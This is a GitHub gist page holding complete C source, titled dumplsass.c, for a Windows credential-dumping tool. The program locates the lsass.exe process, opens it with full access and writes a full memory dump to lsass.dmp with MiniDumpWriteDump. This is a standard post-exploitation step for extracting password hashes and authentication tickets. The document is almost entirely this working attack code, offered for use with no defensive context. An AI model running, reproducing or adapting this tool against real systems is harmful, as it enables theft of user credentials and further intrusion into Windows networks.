Skip to content

Instantly share code, notes, and snippets.

@bats3c

bats3c/dumplsass.c

Last active August 6, 2020 01:55
Show Gist options
  • Save bats3c/cd40ed3c0e7886df27d9186abef2edba to your computer and use it in GitHub Desktop.
Save bats3c/cd40ed3c0e7886df27d9186abef2edba to your computer and use it in GitHub Desktop.
Download ZIP
Dump the memory from lsass
Raw
dumplsass.c
#include <stdio.h>
#include <windows.h>
#include <dbghelp.h>
#include <tlhelp32.h>
DWORD findLsass()
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot)
{
PROCESSENTRY32 pe32;
if(Process32First(hSnapshot,&pe32))
{
do
{
if (strcmp(pe32.szExeFile, "lsass.exe") == 0)
{
return pe32.th32ProcessID;
}
} while(Process32Next(hSnapshot,&pe32));
CloseHandle(hSnapshot);
}
}
return -1;
}
INT main(int argc, char const *argv[])
{
BOOL bDump;
DWORD dwPid;
HANDLE hProcess, hOut;
// get the pid of the lsass process
dwPid = findLsass();
if (dwPid == -1)
{
printf("[!] Failed to find lsass process.\n");
return -1;
}
// create file to hold the lsass dump
hOut = CreateFile("lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOut == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to create file for lsass dump.\n");
return -1;
}
// open a handle to lsass
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
if (hProcess == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to get handle on lsass.\n");
return -1;
}
// create and write the dump to the file
bDump = MiniDumpWriteDump(hProcess, dwPid, hOut, 0x00000002, NULL, NULL, NULL);
if (!bDump)
{
printf("[!] Failed to dump lsass.\n");
return -1;
}
printf("[+] Successfully dumped lsass.\n");
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment